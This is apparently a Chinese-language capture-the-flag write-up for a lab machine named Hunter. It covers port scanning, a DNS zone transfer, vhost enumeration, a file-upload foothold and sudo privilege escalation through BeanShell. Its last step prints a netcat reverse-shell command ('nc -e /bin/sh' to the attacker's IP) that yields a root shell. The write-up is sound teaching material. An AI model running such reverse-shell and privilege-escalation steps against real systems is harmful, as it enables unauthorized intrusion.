# 靶场搭建
下载:Hunter
Nat,IP: 192.168.1.153
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u3 (protocol 2.0) | |
| ssh-hostkey: | |
| 2048 f7:ea:48:1a:a3:46:0b:bd:ac:47:73:e8:78:25:af:42 (RSA) | |
| 256 2e:41:ca:86:1c:73:ca:de:ed:b8:74:af:d2:06:5c:68 (ECDSA) | |
|_ 256 33:6e:a2:58:1c:5e:37:e1:98:8c:44:b1:1c:36:6d:75 (ED25519) | |
53/tcp open domain (unknown banner: not currently available) | |
| fingerprint-strings: | |
| DNSVersionBindReqTCP: | |
| version | |
| bind | |
|_ currently available | |
| dns-nsid: | |
|_ bind.version: not currently available | |
80/tcp open http Apache httpd 2.4.38 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
| http-robots.txt: 1 disallowed entry | |
|_hunterzone.nyx | |
|_http-server-header: Apache/2.4.38 (Debian) |
目录扫描发现了域名,机器上还有 DNS 服务,那么先添加 hosts: hunterzone.nyx
,然后再 axfr 获取一下子域
┌──(root㉿kali)-[~] | |
└─# dig axfr hunterzone.nyx @192.168.1.153 | |
; <<>> DiG 9.19.21-1-Debian <<>> axfr hunterzone.nyx @192.168.1.153 | |
;; global options: +cmd | |
hunterzone.nyx. 604800 IN SOA ns1.hunterzone.nyx. root.hunterzone.nyx. 2 604800 86400 2419200 604800 | |
hunterzone.nyx. 604800 IN NS ns1.hunterzone.nyx. | |
?.hunterzone.nyx. 604800 IN TXT "devhunter.nyx" | |
admin.hunterzone.nyx. 604800 IN A 127.0.0.1 | |
cloud.hunterzone.nyx. 604800 IN A 127.0.0.1 | |
ftp.hunterzone.nyx. 604800 IN A 127.0.0.1 | |
ns1.hunterzone.nyx. 604800 IN A 127.0.0.1 | |
www.hunterzone.nyx. 604800 IN A 127.0.0.1 | |
hunterzone.nyx. 604800 IN SOA ns1.hunterzone.nyx. root.hunterzone.nyx. 2 604800 86400 2419200 604800 | |
;; Query time: 4 msec | |
;; SERVER: 192.168.1.153#53(192.168.1.153) (TCP) | |
;; WHEN: Mon May 27 04:39:09 EDT 2024 | |
;; XFR size: 9 records (messages 1, bytes 294) |
hunterzone 的解析无,解析中还有一个 devhunter.nyx
,测试下
┌──(root㉿kali)-[~] | |
└─# gobuster vhost -u http://devhunter.nyx/ -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 --append-domain | |
=============================================================== | |
Gobuster v3.6 | |
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
=============================================================== | |
[+] Url: http://devhunter.nyx/ | |
[+] Method: GET | |
[+] Threads: 100 | |
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt | |
[+] User Agent: gobuster/3.6 | |
[+] Timeout: 10s | |
[+] Append Domain: true | |
=============================================================== | |
Starting gobuster in VHOST enumeration mode | |
=============================================================== | |
Found: files.devhunter.nyx Status: 200 [Size: 525] |
添加到 host 中,访问发现是一个上传点
fuzz 一下文件后缀,发现可以上传 .htaccess
和 png
上传,访问,拿到 shell
# 提权
sudo -l
发现 bsh 有 sudo 的权限
bug@hunter:/$ sudo bsh | |
BeanShell 2.0b4 - by Pat Niemeyer ([email protected]) | |
bsh % exec("/usr/bin/nc -e /bin/sh 192.168.1.129 4444"); |
弹出来 root 权限